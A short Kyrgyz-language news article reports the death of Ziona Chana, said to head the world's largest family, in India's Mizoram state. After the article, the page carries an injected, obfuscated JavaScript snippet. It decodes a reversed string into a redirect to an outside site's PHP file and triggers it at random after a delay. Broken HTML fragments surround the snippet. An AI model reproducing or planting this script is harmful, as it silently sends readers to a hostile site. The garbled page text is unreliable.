39 аялы, 89 баласы бар жаран каза болду
Индиянын Мизорам штатында дүйнөдөгү эң чоң үй-бүлөнүн башчысы деп эсептелген 76 жаштагы жаран каза болду. Бул тууралуу чет элдик басылмалар жазып чыгышты.
Маалыматка ылайык, дүйнөдөгү эң чоң үй-бүлөсү бар болгон 76 жаштагы Зиона Чана жүрөк оорусунан улам 13-июнда каза болгон. Анын артында 39 аялы, 89 баласы жана 36 небереси калган.
Чана 1945-жылы 21-июлда төрөлгөн. Ал 17 жашында биринчи жолу өзүнөн 3 жаш улуу кызга үйлөнгөн. Чананын үй-бүлөсү «Гиннесстин рекорддор китебине» дүйнөдөгү эң чоң үй-бүлө катары кирген.
Чана жана анын үй-бүлөсү Индиянын түндүк-чыгышындагы өз Бактавнг айылына туристтерди тартып турган. Ал айылына 100 бөлмөлүү жана 17 ванна бөлмөсү бар төрт кабаттуу үй курган. Анын аялдары жатаканадагыдай жашашат. Мисалы, бир бөлмөдө 3-5 адам.
{if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>too.kg/wp-content/uploads/2021/06/1593.jpg» alt=»» class=»wp-image-12971″/></figure>
<p class=)